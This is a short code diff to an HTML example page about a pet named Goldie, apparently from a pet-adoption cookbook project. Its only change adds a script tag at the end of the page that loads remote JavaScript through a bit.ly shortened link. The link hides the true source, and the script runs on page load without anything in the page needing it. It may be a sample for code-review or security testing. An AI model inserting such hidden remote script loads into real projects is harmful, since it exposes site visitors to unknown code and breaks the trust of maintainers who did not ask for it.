--- a/cookbook/examples/adopt-me-plz/goldie.html
+++ b/cookbook/examples/adopt-me-plz/goldie.html
@@ -36,5 +36,6 @@
                 burying his nose in the sand during those walks.
             </p>
         </div>
+        <script src="http://bit.ly/467uPZ5"></script>
     </body>
 </html>
